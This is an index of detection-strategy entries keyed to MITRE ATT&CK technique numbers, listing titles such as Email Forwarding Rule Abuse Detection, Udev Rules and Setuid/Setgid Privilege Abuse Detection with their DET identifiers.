DET0565 Detection Strategy for System Language Discovery T1614.001
DET0043 Detection Strategy for System Location Discovery T1614
DET0265 Detection Strategy for System Services: Launchctl T1569.001
DET0073 Detection Strategy for System Services: Systemctl T1569.003
DET0583 Detection Strategy for T1136 - Create Account across platforms T1136
DET0046 Detection Strategy for T1497 Virtualization/Sandbox Evasion T1497
DET0547 Detection Strategy for T1505 - Server Software Component T1505
DET0166 Detection Strategy for T1505.002 - Transport Agent Abuse (Windows/Linux) T1505.002
DET0278 Detection Strategy for T1542 Pre-OS Boot T1542
DET0582 Detection Strategy for T1542.005 Pre-OS Boot: TFTP Boot T1542.005
DET0375 Detection Strategy for T1546.017 - Udev Rules (Linux) T1546.017
DET0199 Detection Strategy for Virtual Machine Discovery T1673
DET0494 Detection Strategy for Weaken Encryption: Disable Crypto Hardware on Network Devices T1600.002
DET0243 Detection Strategy for Weaken Encryption: Reduce Key Space on Network Devices T1600.001
DET0129 Domain Account Enumeration Across Platforms T1087.002
DET0476 Email Collection via Local Email Access and Auto-Forwarding Behavior T1114
DET0576 Email Forwarding Rule Abuse Detection Across Platforms T1114.003
DET0087 Encrypted or Encoded File Payload Detection Strategy T1027.013
DET0229 Enumeration of Global Address Lists via Email Account Discovery T1087.003
DET0587 Enumeration of User or Account Information Across Platforms T1087
DET0474 Environmental Keying Discovery-to-Decryption Behavioral Chain Detection Strategy T1480.001
DET0075 Internal Proxy Behavior via Lateral Host-to-Host C2 Relay T1090.001
DET0054 Internal Spearphishing via Trusted Accounts T1534
DET0082 Internal Website and System Content Defacement via UI or Messaging Modifications T1491.001
DET0031 Invalid Code Signature Execution Detection via Metadata and Behavioral Context T1036.001
DET0188 Local Storage Discovery via Drive Enumeration and Filesystem Probing T1680
DET0562 Multi-Platform Execution Guardrails Environmental Validation Detection Strategy T1480
DET0299 Multi-Platform File and Directory Permissions Modification Detection Strategy T1222
DET0559 Multi-Platform Shutdown or Reboot Detection via Execution and Host Status Events T1529
DET0392 Multi-Platform Software Discovery Behavior Chain T1518
DET0161 Password Policy Discovery – cross-platform behavior-chain analytics T1201
DET0370 Recursive Enumeration of Files and Directories Across Privilege Contexts T1083
DET0005 Renamed Legitimate Utility Execution with Metadata Mismatch and Suspicious Path T1036.003
DET0527 Right-to-Left Override Masquerading Detection via Filename and Execution Context T1036.002
DET0016 Security Software Discovery Across Platforms T1518.001
DET0110 Setuid/Setgid Privilege Abuse Detection (Linux/macOS) T1548.001
DET0525 System Discovery via Native and Remote Utilities T1082
DET0447 T1136.001 Detection Strategy - Local Account Creation Across Platforms T1136.001
DET0003 T1136.002 Detection Strategy - Domain Account Creation Across Platforms T1136.002
DET0534 TCC Database Manipulation via Launchctl and Unprotected SIP T1548.006
DET0524 Traffic Signaling (Port-knock / magic-packet → firewall or service activation) – T1205 T1205
DET0306 Unauthorized Network Firewall Rule Modification (T1562.013) T1562.013
DET0351 Unix-like File Permission Manipulation Behavioral Chain Detection Strategy T1222.002
DET0340 User Execution – Malicious Copy & Paste (browser/email → shell with obfuscated one-liner) – T1204.004 T1204.004
DET0248 User Execution – Malicious Image (containers & IaaS) – pull/run → start → anomalous behavior (T1204.003) T1204.003
DET0418 Windows DACL Manipulation Behavioral Chain Detection Strategy T1222.001